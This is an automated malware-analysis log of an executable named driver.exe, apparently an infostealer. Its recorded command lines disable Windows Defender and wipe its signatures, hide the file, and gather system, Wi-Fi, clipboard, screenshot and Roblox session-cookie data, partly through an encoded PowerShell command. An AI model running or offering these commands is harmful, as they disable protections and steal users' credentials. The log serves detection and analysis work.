              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
              Source: C:\Users\user\Desktop\driver.exeMutant created: \Sessions\1\BaseNamedObjects\e
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
              Source: C:\Users\user\Desktop\driver.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI57082Jump to behavior
              Source: driver.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\driver.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\SIHClient.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: tasklist.exe, 0000001A.00000002.2177448251.000002081EE14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process;
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: driver.exe, 00000002.00000003.2185261659.000001C0EF1C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: driver.exe, driver.exe, 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: driver.exeVirustotal: Detection: 43%
              Source: driver.exeReversingLabs: Detection: 36%
              Source: driver.exeString found in binary or memory: set-addPolicy
              Source: driver.exeString found in binary or memory: id-cmc-addExtensions
              Source: C:\Users\user\Desktop\driver.exeFile read: C:\Users\user\Desktop\driver.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
